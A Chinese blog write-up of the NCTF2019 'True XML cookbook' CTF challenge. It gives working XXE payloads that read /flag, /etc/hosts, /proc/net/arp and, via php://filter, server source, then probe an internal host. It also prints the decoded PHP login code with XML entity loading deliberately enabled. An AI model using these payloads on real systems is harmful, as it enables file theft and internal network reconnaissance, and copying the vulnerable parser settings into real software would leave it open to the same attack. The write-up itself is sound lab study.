[NCTF2019]True XML cookbook

最新推荐文章于 2024-02-21 23:23:34 发布
最新推荐文章于 2024-02-21 23:23:34 发布
阅读量497 收藏
点赞数
分类专栏: BUUCTF 文章标签: xml web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/127773225
版权

之前做过类似的题

XXE

直接读取根目录的flag

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "file:///flag">
]>
<user>
	<username>
	&xee;
	</username>
	<password>
	123123
	</password>
</user>

报错了

在这里插入图片描述

爆出了绝对路径

读一下doLogin.php的源码

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "file:///var/www/html/doLogin.php">
]>
<user>
	<username>
	&xee;
	</username>
	<password>
	123123
	</password>
</user>

在这里插入图片描述

读取不了,换个协议

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user>
	<username>
	&xee;
	</username>
	<password>
	123123
	</password>
</user>

在这里插入图片描述

得到

PD9waHAKLyoqCiogYXV0b3I6IGMwbnkxCiogZGF0ZTogMjAxOC0yLTcKKi8KCiRVU0VSTkFNRSA9ICdhZG1pbic7IC8v6LSm5Y+3CiRQQVNTV09SRCA9ICcwMjRiODc5MzFhMDNmNzM4ZmZmNjY5M2NlMGE3OGM4OCc7IC8v5a+G56CBCiRyZXN1bHQgPSBudWxsOwoKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiR4bWxmaWxlID0gZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7Cgp0cnl7CgkkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CgkkZG9tLT5sb2FkWE1MKCR4bWxmaWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CgkkY3JlZHMgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCgkkdXNlcm5hbWUgPSAkY3JlZHMtPnVzZXJuYW1lOwoJJHBhc3N3b3JkID0gJGNyZWRzLT5wYXNzd29yZDsKCglpZigkdXNlcm5hbWUgPT0gJFVTRVJOQU1FICYmICRwYXNzd29yZCA9PSAkUEFTU1dPUkQpewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDEsJHVzZXJuYW1lKTsKCX1lbHNlewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDAsJHVzZXJuYW1lKTsKCX0JCn1jYXRjaChFeGNlcHRpb24gJGUpewoJJHJlc3VsdCA9IHNwcmludGYoIjxyZXN1bHQ+PGNvZGU+JWQ8L2NvZGU+PG1zZz4lczwvbXNnPjwvcmVzdWx0PiIsMywkZS0+Z2V0TWVzc2FnZSgpKTsKfQoKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwplY2hvICRyZXN1bHQ7Cj8+

base64解码得到

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/

$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}	
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

看到有个账号密码,登录上去

登录之后啥也没有

使用XXE探测内网存活主机,我们分别读取关键文件:/etc/hosts 和 /proc/net/arp:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "file:///etc/hosts">
]>
<user>
	<username>
	&xee;
	</username>
	<password>
	123123
	</password>
</user>

在这里插入图片描述

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "file:///proc/net/arp">
]>
<user>
	<username>
	&xee;
	</username>
	<password>
	123123
	</password>
</user>

在这里插入图片描述

访问

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "http://10.128.253.12">
]>
<user>
	<username>
	&xee;
	</username>
	<password>
	123123
	</password>
</user>

发包然后发现回显有报错

扫一下c段

在这里插入图片描述在这里插入图片描述

然后通过返回包的长度找到flag(思路如此,但我没找到,看到有人说可能是返回包的问题,写了脚本去跑,我试了一下,也不行)

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛历年题——从第一届到第十四届
[NCTF2019]True XML cookbook Writeup
StevenOnesir的博客
12-29 459
结合本题简要讲解一下xxe攻击 本篇文章默认读者了解Xml基本格式 首先我们看到一个登录界面,使用burp抓包看一下: 这里暴露出来很明显的xxe注入点。 我们开始构造payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE hacker[ <!ENTITY a SYSTEM "file:///etc/passwd"> ]> <user><username>&a;</us
[NCTF2019]True XML cookbook --不会编程的崽
最新发布
不会编程的崽的博客
02-21 878
xxe ssrf 配合
[NCTF 2019]True XML cookbook
m0_70819573的博客
04-21 343
不能直接在根目录读取flag,但可以通过/etc/hosts获取内网。再通过扫描c段获得flag。
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
虹膜图像识别matlab程序
10-09
%用霍夫曼方法对上述像素概率编码 b=fliplr(sort(b));%按降序排列 T=b; [m,n]=size(b); B=zeros(n,n-1);%空的编码表(矩阵) for i=1:n B(i,1)=T(i);%生成编码表的第一列 end r=B(i,1)+B(i-1,1);%最后两个元素相加 T(n-1)=r; T(n)=0; T=fliplr(sort(T)); t=n-1; for j=2:n-1%生成编码表的其他各列 for i=1:t B(i,j)=T(i); end K=find(T==r); B(n,j)=K(end);%从第二列开始,每列的最后一个元素记录特征元素在该列的位置 r=(B(t-1,j)+B(t,j));%最后两个元素相加 T(t-1)=r; %把相边的值排在后面 T(t)=0; %把最后一个数清空 T=fliplr(sort(T)); %重新进行降序排列 t=t-1; end END1=sym('[0,1]');%给最后一列的元素编码 END=END1; t=3; d=1;
RSA加密软件 (VC++,MFC程序实现)
05-27
RSA加密程序实现VC++ ,MFC 可以产生任意位数的大数素,可以作为毕业论文哈。也是学习RSA加密的好例子,可以学到很多的加密函数和加密算法,很多算法是很经典的 ,比如欧拉定理,费马定理,还有中国剩余定理等.........
论文研究 - 健康志愿者皮肤修复的美速疗法配方的临床评估
06-01
我们的主要目标是评估在皮内显微注射NCTF135HA:registered:后面部,颈部和领口皮肤质量的改善情况。 该混合物由FILORGA Laboratories制造,包含非交联的透明质酸,维生素,抗氧化剂,矿物质盐和酶。 观察到鱼尾纹...
[NCTF2019]True XML cookbook 1
snowlyzz的博客
05-05 501
又是一道关于XML注入的题 xml语法: <?xml version="1.0" encoding="UTF-8"?> //xml声明 ​ <!DOCTYPE copyright [ //DTD(文档类型定义) ​ <!ELEMENT note (to,reset,login)> //定义元素 ​ <!ENTITY test SYSTEM "url"> //定义外部实体test ​ ]> 直接抓包! <...
BUU [NCTF2019]True XML cookbook
qq_62078839的博客
04-19 1837
打开连接 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml payload:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>123456</passwo...
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值